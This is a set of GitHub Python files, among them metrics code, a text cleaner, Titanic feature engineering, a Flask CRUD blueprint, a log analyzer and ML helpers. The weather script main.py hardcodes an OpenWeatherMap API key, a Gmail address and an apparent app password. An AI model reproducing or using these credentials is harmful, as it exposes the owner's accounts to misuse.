P\r\n\r\n\r\n# 状态识别指标计算\r\ndef identify_indicators(output, labels):\r\n print(output.shape)\r\n row = output.size(1)\r\n matrix_array = torch.zeros(row, row) # 创建矩阵,行代表真实标签,列代表预测标签\r\n indicator_array = torch.zeros(row, row) # 创建矩阵,行代表类别,列代表指标(TP、TN、FP)\r\n Precision = torch.zeros(row) # 保存每一类的Precision值\r\n Recall = torch.zeros(row) # 保存每一类的Recall值\r\n for i in range(row):\r\n for j in range(row):\r\n # output.max(-1):返回每行最大的值和下标,[0]代表值,[1]代表下标\r\n matrix_array[i, j] = ((output.max(-1)[1] == j) & (labels == i)).sum()\r\n print(\"matrix_array:\", matrix_array)\r\n for m in range(row):\r\n indicator_array[m, 0] = matrix_array[m, m] # TP\r\n indicator_array[m, 1] = torch.sum(matrix_array[m]) - matrix_array[m, m] # FN\r\n indicator_array[m, 2] = torch.sum(matrix_array[:, m]) - matrix_array[m, m] # FP\r\n print(\"indicator_array:\", indicator_array)\r\n ACC = torch.sum(torch.diagonal(matrix_array)) / torch.sum(matrix_array)\r\n for n in range(row):\r\n Precision[n] = indicator_array[n, 0] / (indicator_array[n, 0] + indicator_array[n, 2])\r\n Recall[n] = indicator_array[n, 0] / (indicator_array[n, 0] + indicator_array[n, 1])\r\n print(\"Precision:\", Precision)\r\n print(\"Recall:\", Recall)\r\n return ACC, Precision, Recall\r\n\r\n\r\n# 风险预测指标计算\r\ndef predict_indicators(output, labels, num):\r\n output[output > num] = 1\r\n output[output <= num] = 0\r\n TP = ((output == 1) & (labels == 1)).sum()\r\n TN = ((output == 0) & (labels == 0)).sum()\r\n FP = ((output == 0) & (labels == 1)).sum()\r\n FN = ((output == 1) & (labels == 0)).sum()\r\n ACC = (TP + TN) / (TP + TN + FP + FN)\r\n SEN = TP / (TP + FN)\r\n SPE = TN / (FP + TN)\r\n BAC = (SEN + SPE) / 2\r\n return ACC, SEN, SPE, BAC\r\n\r\n\r\n","repo_name":"fmri123456/SM-GAN","sub_path":"5_utils.py","file_name":"5_utils.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18420064276","text":"from src.algo.stopwords import customStopWords\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom nltk.stem.porter import PorterStemmer\r\n\r\n\r\n# function that takes list of raw texts and returns list of clean texts\r\ndef get_clean_texts(list_of_texts):\r\n list_of_clean_texts = []\r\n for each in list_of_texts:\r\n cleaned_text = text_cleaner(each)\r\n if (cleaned_text != ''):\r\n list_of_clean_texts.append(cleaned_text)\r\n return list_of_clean_texts\r\n\r\n\r\n# function that takes a raw text and return clean text\r\ndef text_cleaner(text):\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n ps = PorterStemmer()\r\n tokenized_text = tokenizer.tokenize(text.lower())\r\n clean_tokenized_text = [] # will add words after filtering stopwords\r\n for each_token in tokenized_text:\r\n if each_token not in customStopWords():\r\n # to remove stopword tokens\r\n clean_tokenized_text.append(each_token)\r\n stemmed_text = []\r\n for token in clean_tokenized_text:\r\n # appending the stemmed words in stemmed data\r\n stemmed_text.append(ps.stem(token))\r\n clean_data = \" \".join(stemmed_text) # changing tokens into one sentence\r\n return clean_data\r\n","repo_name":"aprashantz/final-year-project-undergrad","sub_path":"backend-flask/src/algo/data_preprocessor.py","file_name":"data_preprocessor.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"18894513143","text":"#worth\r\n\r\nnome = 'guilherme'\r\ninic= 2\r\nfim = 4\r\n\r\ndef sspliter(string, index):\r\n resultado = ''\r\n for c in range(index):\r\n recebe = string[c]\r\n resultado += recebe\r\n return resultado\r\n\r\ndef sspliter2(string, start, end):\r\n atual = end\r\n if end <= 3:\r\n resultado = ''\r\n start -= 1\r\n end += start\r\n for c in range(start, end):\r\n recebe = string[c]\r\n resultado += recebe\r\n return resultado\r\n else:\r\n if end <= 4:\r\n resultado = ''\r\n start -= 1\r\n end += start\r\n for c in range(start, end):\r\n recebe = string[c - (atual - 2)]\r\n resultado += recebe\r\n return resultado\r\n\r\n\r\nif __name__ == '__main__':\r\n teste = sspliter(nome, inic)\r\n print(teste)\r\n teste2 = sspliter2(nome, inic, fim)\r\n print(teste2)","repo_name":"AliETninja/ascii_webcam_discord_bot","sub_path":"duplicidade_sspliter.py","file_name":"duplicidade_sspliter.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"69979518588","text":"import numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom functools import partial\nimport re\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, KBinsDiscretizer, OrdinalEncoder\n\nfrom imblearn.pipeline import Pipeline\n\n\ndef grouper(elem, group_names, group_limits):\n \"\"\" Assign elem (float/int) into a group based on group_limits of groups.\n Group limits are upper bounds for groups, i.e. group can contain only elements that are less than\n its group limit. Group limit of previous group (left in the list) is the lower bound for group.\"\"\"\n return group_names[np.argmax(elem < np.array(group_limits))]\n\n\nclass CreateNewFeatures(BaseEstimator, TransformerMixin):\n \"\"\"Pipeline component that is used to create new features. New features are specified\n in transform() method.\n\n Input, i.e. X, must be data frame.\n Output is a new dataframe with new features added as columns.\n \"\"\"\n\n def __init__(self, group_size_limits=[2, 5, np.inf], group_rate_limits=[0.5, np.inf],\n family_size_limits=[2, 5, np.inf], family_rate_limits=[0.5, np.inf], split_other_title=False):\n self.group_size_limits = group_size_limits\n self.group_rate_limits = group_rate_limits\n self.family_size_limits = family_size_limits\n self.family_rate_limits = family_rate_limits\n self.split_other_title = split_other_title\n\n def fit(self, X, y=None):\n self.names = X['Name']\n self.familykeys = [(ticket, name.split(',')[0]) for ticket, name in X[['Ticket', 'Name']].values]\n\n self.ticket_counter = Counter(X['Ticket'])\n self.familykey_counter = Counter(self.familykeys)\n\n X_no_family = X[(X['Parch'] == 0) & (X['SibSp'] == 0)]\n self.gender_survival_rates = X_no_family.groupby(['Sex'])['Survived'].mean()\n\n self.group_survival_rates = {ticket: np.mean(X.loc[X['Ticket'] == ticket, 'Survived'])\n for ticket in self.ticket_counter\n if self.ticket_counter[ticket] > 1}\n\n self.family_survival_rates = {\n family_key: np.mean(X.loc[(np.array(self.familykeys) == family_key).all(axis=1), 'Survived'])\n for family_key in self.familykey_counter\n if self.familykey_counter[family_key] > 1\n }\n\n return self\n\n def transform(self, X, y=None):\n new_X = X.copy(deep=True)\n assert isinstance(new_X, pd.core.frame.DataFrame), 'Input must be pandas Data Frame!'\n\n # Feature that tells if passenger has cabin or not\n new_X['HasCabin'] = ~new_X['Cabin'].isna()\n\n # Feature that tells passenger's cabin type\n new_X['CabinType'] = [cabin[0] if not pd.isnull(cabin) else 'None' for cabin in new_X['Cabin']]\n\n # Feature that tells surname of passenger\n new_X['Surname'] = [name.split(',')[0] for name in new_X['Name']]\n\n # Feature for title of passenger\n p = re.compile(r'(?P\\b\\w+)\\.') # regular expression for searching title (ends always to dot)\n new_X['Title'] = [p.search(name).group('title') for name in new_X['Name']]\n\n # Feature for more grouped title of passenger\n title_mapping = {\n 'Mrs': 'Mrs',\n 'Mme': 'Mrs',\n 'Mlle': 'Miss',\n 'Miss': 'Miss',\n 'Mr': 'Mr',\n 'Master': 'Master',\n 'Rev': 'Religious'\n }\n new_X['Title_grouped'] = new_X['Title'].map(title_mapping)\n new_X['Title_grouped'].fillna('Other', inplace=True)\n if self.split_other_title:\n mr = new_X[(new_X['Title_grouped'] == 'Other') & (new_X['Sex'] == 'male')]\n miss = new_X[(new_X['Title_grouped'] == 'Other') & (new_X['Sex'] == 'female') &\n (new_X['SibSp'] == 0)]\n mrs = new_X[(new_X['Title_grouped'] == 'Other') & (new_X['Sex'] == 'female') &\n (new_X['SibSp'] > 0)]\n new_X.loc[mr.index, 'Title_grouped'] = 'Mr'\n new_X.loc[miss.index, 'Title_grouped'] = 'Miss'\n new_X.loc[mrs.index, 'Title_grouped'] = 'Mrs'\n\n\n # Feature for family size\n new_X['FamilySize'] = new_X['Parch'] + new_X['SibSp'] + 1\n\n # Group into categories\n grouper_familysize = partial(grouper, group_names=list(range(len(self.family_size_limits))),\n group_limits=self.family_size_limits)\n new_X['FamilySize_grouped'] = new_X['FamilySize'].map(grouper_familysize)\n\n # Feature for group size\n is_in_train_data = np.isin(new_X['Name'], self.names)\n not_fitted_rows = new_X.loc[~is_in_train_data, :]\n ticket_counter_test = Counter(not_fitted_rows['Ticket'])\n\n new_X['GroupSize'] = [self.ticket_counter.get(ticket, 0) + ticket_counter_test.get(ticket, 0)\n for ticket in new_X['Ticket']]\n\n # take family size if it's higher than group number based on tickets\n new_X['GroupSize'] = np.maximum(new_X['GroupSize'], new_X['FamilySize'])\n\n # Group into categories\n grouper_groupsize = partial(grouper, group_names=list(range(len(self.group_size_limits))),\n group_limits=self.group_size_limits)\n new_X['GroupSize_grouped'] = new_X['GroupSize'].map(grouper_groupsize)\n\n # Feature for group survival rates\n new_X['GroupRate'] = [self.group_survival_rates.get(row['Ticket'],\n self.gender_survival_rates[row['Sex']])\n for _, row in new_X.iterrows()]\n\n # GroupRate into categories\n grouper_grouprate = partial(grouper, group_names=list(range(len(self.group_rate_limits))),\n group_limits=self.group_rate_limits)\n new_X['GroupRate_grouped'] = new_X['GroupRate'].map(grouper_grouprate)\n\n # Feature for family survival rates\n new_X['FamilyRate'] = [self.family_survival_rates.get((row['Ticket'], row['Surname']),\n self.gender_survival_rates[row['Sex']])\n for _, row in new_X.iterrows()]\n\n grouper_familyrate = partial(grouper, group_names=list(range(len(self.family_rate_limits))),\n group_limits=self.family_rate_limits)\n new_X['FamilyRate_grouped'] = new_X['FamilyRate'].map(grouper_familyrate)\n\n # Feature for adjusted Fare\n new_X['Fare_adjusted'] = new_X['Fare'] / new_X['GroupSize']\n\n return new_X\n\n\nclass Preprocessor(BaseEstimator, TransformerMixin):\n\n def __init__(self, label='Survived', categorical_cols=[], numerical_cols=[], ordinal_cols=[]):\n self.label = label\n self.categorical_cols = categorical_cols\n self.numerical_cols = numerical_cols\n self.ordinal_cols = ordinal_cols\n\n def fit(self, X, y=None):\n X_features = X.copy(deep=True)\n\n if len(self.categorical_cols) == len(self.numerical_cols) == len(self.ordinal_cols) == 0:\n X_features = X.drop(columns=[self.label]) if self.label in X.columns else X.copy(deep=True)\n cat_cols = X_features.dtypes[X_features.dtypes == 'object'].index.tolist()\n self.categorical_cols = [col for col in cat_cols if len(set(X_features[col])) <= 8]\n\n num_cols = X_features.dtypes[np.isin(X_features.dtypes, ['float64'])].index.tolist()\n self.numerical_cols = [col for col in num_cols if len(set(X_features[col])) > 8]\n\n ord_cols = X_features.dtypes[np.isin(X_features.dtypes, ['int64'])].index.tolist()\n self.ordinal_cols = [col for col in ord_cols if len(set(X_features[col])) <= 8]\n\n fn_numerical = Pipeline(steps=[\n ('scaling', StandardScaler()),\n ])\n fn_categorical = Pipeline(steps=[\n ('encoding', OneHotEncoder(drop='if_binary', handle_unknown='infrequent_if_exist', sparse=False))\n ])\n fn_ordinal = Pipeline(steps=[\n ('encoding', OrdinalEncoder(handle_unknown='use_encoded_value', unknown_value=np.nan))\n ])\n\n self.preprocessor = ColumnTransformer(transformers=[\n ('num', fn_numerical, self.numerical_cols),\n ('cat', fn_categorical, self.categorical_cols),\n ('ord', fn_ordinal, self.ordinal_cols)\n ])\n self.preprocessor.fit(X_features, y)\n\n return self\n\n def get_categorical(self, X):\n return self.categorical_cols\n\n def get_numerical(self, X):\n return self.numerical_cols\n\n def get_ordinal(self, X):\n return self.ordinal_cols\n\n def transform(self, X, y=None):\n self.new_colnames = self.preprocessor.get_feature_names_out()\n return pd.DataFrame(self.preprocessor.transform(X), columns=self.new_colnames, index=X.index)\n","repo_name":"jiisalme/data-science-with-titanic-dataset","sub_path":"utils/feature_engineering_utils.py","file_name":"feature_engineering_utils.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15364157033","text":"# Code Festival 2016 qual A - B\n\n# 模範解答通りの実装方法を自力で導き出して、模範的なコードを書いて解答できた。\nn = int(input())\nrabbits = [int(x)-1 for x in input().split()]\nans = 0\n\nfor i in range(n):\n #print(i,rabbits[rabbits[i]])\n if rabbits[rabbits[i]] == i:\n ans += 1 \n\nprint(ans//2) \n # ループ時点では組み合わせの重複カウントを許してしまっているので、最後に2で割る必要がある","repo_name":"idylle-cynique/atcoder_problems","sub_path":"Other-Sponsored/CodeFestival2016qualA-B.py","file_name":"CodeFestival2016qualA-B.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2006545194","text":"import requests\n\nAPI_KEY = \"de09321be213f7333ddc68f69f0e6936\"\nMAIL = \"sue.is.developing@gmail.com\"\nPWD = \"yjlwomkdkfetmwlx\"\n\nparameters = {\n \"lat\": \"39.31\", #52.520008\",\n \"lon\": \"-74.5\", #13.404954\",\n \"exclude\": \"alerts,minutely,hourly,daily\",\n \"appid\": API_KEY,\n}\n\nresponse = requests.get(\"https://api.openweathermap.org/data/3.0/onecall\", params=parameters)\nresponse.raise_for_status()\n#data = response.json()\n","repo_name":"sierrauniformecho/day-35","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71754429949","text":"import flask\nfrom bson.json_util import dumps\nfrom flask.templating import render_template\nfrom . import models\nfrom config.api import cabecalhos\n\nbp = flask.Blueprint(\"naves\", __name__, url_prefix=\"/naves\")\n\n@bp.route(\"\")\ndef index():\n naves = list(models.naves())\n return flask.render_template(\"naves/index.html\",\n naves=naves)\n\n@bp.route(\"/<id>/editar\", methods=[\"GET\", \"POST\"])\ndef editar_nave(id):\n if flask.request.method == 'GET':\n nave = models.get_nave(id) \n return flask.render_template(\"naves/edit.html\", nave=nave)\n \n elif flask.request.method == 'POST':\n novo_nome = flask.request.form['nave_nome']\n models.modificar_naves(id, {'nome': novo_nome})\n return flask.redirect(flask.url_for(\"naves.index\"))\n\n@bp.route(\"/criar\", methods=[\"GET\", \"POST\"])\ndef criar_nave():\n if flask.request.method == 'GET':\n return flask.render_template(\"naves/edit.html\", verbo=\"Criar\")\n \n elif flask.request.method == 'POST':\n nome = flask.request.form['nave_nome']\n models.criar_naves({'nome': nome})\n return flask.redirect(flask.url_for(\"naves.index\"))\n\n@bp.route(\"/<id>/deletar\")\ndef deletar_naves(id):\n models.deletar_naves(id)\n return flask.redirect(flask.url_for(\"naves.index\"))\n\n##### API #####\n\n@bp.route(\"api\")\ndef listar_naves():\n naves = dumps(list(models.naves()))\n return flask.Response(naves, headers=cabecalhos)\n\n@bp.route(\"api\", methods=[\"POST\"])\ndef criar_nave_api():\n nave = flask.request.json\n result = models.criar_naves(nave)\n return flask.jsonify({\"id\": str(result.inserted_id)})\n\n@bp.route(\"api/<int:id>\")\ndef get_nave(id):\n naves = dumps(list(models.get_naves())[id])\n return flask.Response(naves, headers=cabecalhos)\n\n@bp.route(\"api/<int:id>\", methods=[\"PUT\"])\ndef modificar_nave(id):\n nave = flask.request.json\n naves = list(models.naves())\n nave_velha = naves[id]\n result = models.modificar_naves(\n {\"_id\": nave_velha[\"_id\"]},\n nave\n )\n return flask.jsonify({\n \"modificationsa\": result.modified_count\n })\n ","repo_name":"elderlima/4linux","sub_path":"sw/naves/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31064759052","text":"import os, re\nimport os.path\nimport pprint\nimport numpy as np\nimport copy\nimport sys\n\ndef parseLog(logText):\n rawLogEntries = re.split(r'\\|\\| (?:[a-zA-Z0-9\\-\\_]* \\- )?\\*+ \\/\\\\ ([a-zA-Z0-9 \\_]*) \\/\\\\ \\**', logText, flags=re.MULTILINE)\n logEntries = {}\n for k in range(len(rawLogEntries)//2):\n index = k\n state = rawLogEntries[2*k+1].strip()\n content = rawLogEntries[2*k].strip().splitlines()\n if state not in logEntries:\n logEntries[state] = []\n logEntries[state].append((index, state, content))\n return logEntries\n\ndef summarizeLog(logEntries, filteredLogEntries):\n print(\"SUMMARY OF LOG MESSAGES:\")\n lines = []\n allKeys = list(set(logEntries.keys()) | set(filteredLogEntries.keys()))\n keyHeader = 'Entry type'\n countHeader = 'Total #'\n filtCountHeader = 'Filtered #'\n maxKeyLength = len(keyHeader)\n maxCountLength = max(len(countHeader), len(filtCountHeader))\n for key in allKeys:\n if key in logEntries:\n count = str(len(logEntries[key]))\n else:\n count = '.'\n if key in filteredLogEntries:\n filtCount = str(len(filteredLogEntries[key]))\n else:\n filtCount = '.'\n lines.append([key, count, filtCount])\n maxKeyLength = max(maxKeyLength, len(key))\n maxCountLength = max(maxCountLength, len(count), len(filtCount))\n\n tableSpec = '{key:{fill}<{keyWidth}}{filtCount:{fill}<{countWidth}}{count:{fill}<{countWidth}}'\n fillChar = ' '\n print(tableSpec.format(key=keyHeader, count=countHeader, filtCount=filtCountHeader, fill=fillChar, keyWidth=maxKeyLength+1, countWidth=maxCountLength+1))\n for line in lines:\n key, count, filtCount = line\n print(tableSpec.format(key=key, count=count, filtCount=filtCount, fill=fillChar, keyWidth=maxKeyLength+1, countWidth=maxCountLength+1))\n\ndef printLog(logEntries, abridge=False, ordered=False):\n if ordered:\n flattenedLogEntries = []\n for key in logEntries:\n flattenedLogEntries = flattenedLogEntries + logEntries[key]\n logEntries = sorted(flattenedLogEntries, key=lambda entry:entry[0])\n if abridge:\n threshold = 50\n logEntries = logEntries[:threshold//2-1] + [('...', '', '')] + logEntries[-threshold//2:]\n for logEntry in logEntries:\n index, type, lines = logEntry\n print('{index}: {type}'.format(index=index, type=type))\n for line in lines:\n print(' {line}'.format(line=line))\n else:\n logEntryKeys = logEntries.keys()\n if abridge:\n threshold = 10\n logEntries = copy.deepcopy(logEntries)\n for key in logEntryKeys:\n if len(logEntries[key]) > threshold:\n logEntries[key] = logEntries[key][:threshold//2-1] + [('...', '', '')] + logEntries[key][-threshold//2:]\n for key in logEntryKeys:\n print(key)\n for logEntry in logEntries[key]:\n index, type, lines = logEntry\n print(' {index}: {type}'.format(index=index, type=type))\n for line in lines:\n print(' {line}'.format(line=line))\n# pp.pprint(logEntries)\n\npp = pprint.PrettyPrinter(width=240)\nroot, thisScript = os.path.split(os.path.realpath(__file__))\n\nif len(sys.argv) > 1:\n # Don't use most recent log, look back N logs, N given by the first commandline argument\n lookback = int(sys.argv[1])\nelse:\n lookback = 0\n\n#root = r'C:\\Users\\Goldberg\\Documents\\PyVAQ'\nlogFolder = os.path.join(root, 'logs')\nlogs = sorted(os.listdir(logFolder))\nlastLog = os.path.join(logFolder, logs[-1-lookback])\nprint('Analyzing log:', lastLog)\nwith open(lastLog, 'r') as f:\n logText = f.read();\n\n# afreq = float(re.findall('actual audio frequency\\: *([0-9\\.]*)', logText)[0])\n# vfreq = float(re.findall('actual video frequency\\: *([0-9\\.]*)', logText)[0])\n# sampList = [int(sampNum) for sampNum in re.findall('\\# samples\\:([0-9]*)', logText)]\n# frameList = [int(frameNum) for frameNum in re.findall('\\# frames\\:([0-9]*)', logText)]\n# imageIDList = [int(imageID) for imageID in re.findall('Image ID\\:([0-9]*)', logText)]\n# if len(sampList) * len(frameList) > 0:\n# chunkSize = 1000\n# sampT = np.array(range(len(sampList))) / (afreq / chunkSize)\n# frameT = np.array(range(len(frameList))) / (vfreq)\n#\n# frameInterp = np.interp(sampT, frameT, frameList)\n# print('Max audio/video chunk/frame discrepancy:')\n# print('Expected: <', max([chunkSize/afreq, 1/vfreq]))\n# print('Actual: ', max((np.array(sampList) * vfreq / afreq) - frameInterp) * (1/vfreq))\n#\n# print('Dropped frames:', max(abs((1 + np.array(imageIDList)) - np.array(frameList))))\n\nlogEntries = parseLog(logText)\nfilterList = []\nfilteredLogEntries = copy.deepcopy(logEntries)\nordered = False\n\nsummarizeLog(logEntries, filteredLogEntries)\nprint()\n\nwhile True:\n printEntries = True\n filtInput = input(\"Enter a filtering command ('h' for help): \")\n try:\n filtType, filt = filtInput.split(' ', maxsplit=1)\n except ValueError:\n filtType = filtInput\n filt = ''\n newFilteredLogEntries = copy.deepcopy(filteredLogEntries)\n if filtType == 'i':\n # INDEX FILTERING\n newFilteredLogEntries = {}\n filterList.append(filtInput)\n cnt, rad = [int(i) for i in filt.strip().split(' ')]\n for key in filteredLogEntries:\n for entry in filteredLogEntries[key]:\n index, state, content = entry\n if abs(index - cnt) <= rad:\n if key not in newFilteredLogEntries:\n newFilteredLogEntries[key] = [];\n newFilteredLogEntries[key].append(entry)\n elif filtType == 'rx':\n filterList.append(filtInput)\n filtRegex = re.compile(filt, flags=re.MULTILINE)\n groups = filtRegex.groups + 1\n extractedData = []\n matches = []\n maxMatchLengths = [0 for k in range(groups)]\n for key in filteredLogEntries.keys():\n for entry in filteredLogEntries[key]:\n index, state, content = entry\n matches += re.finditer(filtRegex, '\\n'.join(content))\n for match in matches:\n extractedDatum = []\n for k in range(groups):\n extractedDatum.append(match.group(k))\n maxMatchLengths[k] = max(maxMatchLengths[k], len(extractedDatum[k])+2)\n extractedData.append(extractedDatum)\n\n print(''.join(['{data['+str(k)+']:{width['+str(k)+']}}' for k in range(groups)]).format(data=['Match'] + ['Group {k}'.format(k=k) for k in range(groups)], width=maxMatchLengths))\n for extractedDatum in extractedData:\n print(''.join(['{data['+str(k)+']:{width['+str(k)+']}}' for k in range(groups)]).format(data=extractedDatum, width=maxMatchLengths))\n elif filtType == 'r':\n # REGEX FILTERING\n newFilteredLogEntries = {}\n filterList.append(filtInput)\n negate = False\n if filt.split(' ')[0] == 'not':\n filt = filt.split(' ', maxsplit=1)[1]\n negate = True\n filtRegex = re.compile(filt, flags=re.MULTILINE)\n for key in filteredLogEntries.keys():\n for entry in filteredLogEntries[key]:\n index, state, content = entry\n if negate ^ bool(re.search(filtRegex, '\\n'.join(content))):\n if key not in newFilteredLogEntries:\n newFilteredLogEntries[key] = []\n newFilteredLogEntries[key].append(entry)\n elif filtType == 't':\n # ENTRY TYPE REGEX FILTERING\n newFilteredLogEntries = {}\n filterList.append(filtInput)\n filtRegex = re.compile(filt)\n for key in filteredLogEntries.keys():\n if re.search(filtRegex, key):\n newFilteredLogEntries[key] = []\n for entry in filteredLogEntries[key]:\n newFilteredLogEntries[key].append(entry)\n elif filtType == 'c':\n printEntries = False\n filterList = []\n filteredLogEntries = copy.deepcopy(logEntries)\n newFilteredLogEntries = copy.deepcopy(filteredLogEntries)\n print('Clearing all filters')\n elif filtType == 'o':\n ordered = not ordered\n if ordered:\n print('Index ordering is now on')\n else:\n print('Index ordering is now off')\n elif filtType == 'h':\n printEntries = False\n # Help with filtering:\n helptext = '''\nFilter syntax:\n Regex filtering:\n r REGEX\n REGEX = a regular expression to filter by\n r not REGEX\n Displays all entries that do NOT match the regex\n Index filtering:\n i MID RAD\n Displays all entries numnbers from MID - RAD to MID + RAD\n Toggle ordering\n o\n Toggle between printing ordered by time index, or sorted by log type\n Display help\n h\n Print help text'''\n print(helptext)\n print()\n else:\n printEntries = False\n print('Filter command not recognized. Type \"h\" for help.')\n continue\n\n filteredLogEntries = copy.deepcopy(newFilteredLogEntries)\n\n if printEntries:\n filteredCount = sum([len(filteredLogEntries[key]) for key in filteredLogEntries])\n\n if filteredCount > 100:\n howMany = input('There are {n} entries. Display all/some/none (a/s/n)? '.format(n=filteredCount))\n if howMany == 'a':\n printLog(filteredLogEntries, abridge=False, ordered=ordered)\n elif howMany == 's':\n printLog(filteredLogEntries, abridge=True, ordered=ordered)\n else:\n printLog(filteredLogEntries, abridge=False, ordered=ordered)\n\n print()\n\n summarizeLog(logEntries, filteredLogEntries)\n print()\n\n if len(filterList) > 0:\n print('Filters:')\n for filt in filterList:\n print('\\t'+filt)\n print()\n\n\n#errorList = re.findall('([Ee]rror in [a-zA-Z\\ ]*)([^\\|]*)\\|\\|', logText, flags=(re.MULTILINE | re.DOTALL))\n#for errorState, errorDescription in errorList:\n# errorParts = errorDescription.split()\n# errorName = errorParts[-1]\n# print(errorState, errorName)\nr'''\n|| *********************************** /\\ AW BUFFERING /\\ ********************************************\n|| Update trigger to stop now\n|| msg=, exitFlag=False\n|| *********************************** /\\ AT ANALYZING /\\ ********************************************\n|| VW_19355735 - partially missed trigger by 2.0140631198883057 seconds, which is 60.421908702126345 frames!\n|| msg=, exitFlag=False\n|| *********************************** /\\ VW_19355735 BUFFERING /\\ ********************************************\n|| VA_19355735 ERROR STATE. Error messages:\n\n\n|| Error in ACQUIRING state\n\nTraceback (most recent call last):\n File \"C:\\Users\\GLab\\Documents\\PyVAQ\\StateMachineProcesses.py\", line 2565, in run\n self.imageQueue.put(imageResult, metadata={'frameTime':frameTime})\n File \"C:\\Users\\GLab\\Documents\\PyVAQ\\SharedImageQueue.py\", line 113, in put\n self.metadataQueue.put(metadata, block=False)\n File \"C:\\Users\\GLab\\AppData\\Local\\Programs\\Python\\Python37\\lib\\multiprocessing\\queues.py\", line 83, in put\n raise Full\nqueue.Full\n\n|| msg=, exitFlag=False\n|| *********************************** /\\ VA_19355735 ERROR /\\ ********************************************\n|| AW - Sending audio filename to merger\n|| msg=, exitFlag=False\n|| *********************************** /\\ AW WRITING /\\ ********************************************\n|| Send new trigger!\n'''\n","repo_name":"GoldbergLab/PyVAQ","sub_path":"analyzePyVAQLog.py","file_name":"analyzePyVAQLog.py","file_ext":"py","file_size_in_byte":11642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25208970676","text":"\"\"\"\ncustom functions for machine learning projects\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn import metrics\nfrom sklearn.preprocessing import OneHotEncoder\n\ndef onehotencode(X, keep_index=False):\n \"\"\"\n One hot encode categorical variables for a single dataframe\n \"\"\"\n X_ind = X.index\n X_obj = X[[col for col, dtype in list(zip(X.columns, X.dtypes)) if dtype == np.dtype('O')]]\n X_nonobj = X[[col for col, dtype in list(zip(X.columns, X.dtypes)) if dtype != np.dtype('O')]]\n\n ohe = OneHotEncoder(handle_unknown='ignore')\n X_obj_ohe = ohe.fit_transform(X_obj)\n\n X_nonobj_df = pd.DataFrame(X_nonobj).reset_index(drop=True)\n X_obj_ohe_df = pd.DataFrame(X_obj_ohe.todense(), columns=ohe.get_feature_names()).reset_index(drop=True)\n\n X_all = pd.concat([X_nonobj_df, X_obj_ohe_df], axis=1)\n\n if keep_index:\n X_all.index = X_ind\n\n return X_all\n\ndef onehotencode_train_test(train, test, keep_index=False):\n \"\"\"\n Take train and test datasets in the form of panda dataframes, \n onehotencode categorical in both train and test sets by \n fitting to train set ony. Return both datasets with onehotencoded variables.\n If keep_index True, original index in train and test will be kept, otherwise\n index will be reset for both.\n \"\"\"\n train_ind = train.index\n test_ind = test.index\n\n train_obj = train[[col for col, dtype in list(zip(train.columns, train.dtypes))\n if dtype == np.dytpe('O')]]\n train_nonobj = train[[col for col, dtype in list(zip(train.columns, train.dtypes))\n if dtype != np.dytpe('O')]]\n \n test_obj = test[[col for col, dtype in list(zip(test.columns, test.dtypes))\n if dtype == np.dytpe('O')]]\n test_nonobj = test[[col for col, dtype in list(zip(test.columns, test.dtypes))\n if dtype != np.dytpe('O')]]\n\n ohe = OneHotEncoder(hande_unknown='ignore')\n train_obj_ohe = ohe.fit_transform(train_obj)\n\n train_nonobj_df = pd.DataFrame(train_nonobj).reset_index(drop=True)\n train_obj_ohe_df = pd.DataFrame(train_obj_ohe.todense(), columns=ohe.get_feature_names()).reset_index(drop=True)\n train_all = pd.concat([train_nonobj_df, train_obj_ohe_df], axis=1)\n\n test_obj_ohe = ohe.transform(test_obj)\n test_nonobj_df = pd.DataFrame(test_nonobj).reset_index(drop=True)\n test_obj_ohe_df = pd.DataFrame(test_obj_ohe.todense(), columns=ohe.get_feature_names()).reset_index(drop=True)\n test_all = pd.concat([test_nonobj_df, test_obj_ohe_df], axis=1)\n\n if keep_index:\n train_all.index = train_ind\n test_all.index = test_ind\n \n return train_all, test_all\n\ndef plot_confusion_matrix(y_true, y_pred, model_name='', cmap=plt.cm.Blues):\n \"\"\"\n plot confusion matrix for array of true labels and array of predictions from \n a classifier model\n \"\"\"\n #initialize confusion matrix\n cm = metrics.confusion_matrix(y_true, y_pred)\n cm_norm = metrics.confusion_matrix(y_true, y_pred, normalize='true')\n\n #turn off gridlines (if any)\n plt.grid(b=None)\n #plot basic matrix\n plt.imshow(cm_norm, cmap=cmap)\n\n #add title and axis labels\n plt.title('Confusion Matrix {}'.format(model_name))\n plt.xlabel('Predictions')\n plt.ylabel('True Labels')\n\n #add axis scale and markers\n class_names = set(np.unique(y_true))\n tick_marks = np.arange(len(class_names))\n plt.xticks(tick_marks, class_names, rotation=45, fontsize=12)\n plt.yticks(tick_marks, class_names, fontsize=12)\n\n #format matrix\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i,j], horizontalalignment='center', fontdict={'size':12},\n color='white' if cm_norm[i,j] > 0.5 else 'black')\n\ndef plot_roc_curve(y_labels, y_score, clf_name='Binary Classifier'):\n \"\"\"\n plot roc curve for one set of true labels and prediciton scores for a binary classifier\n 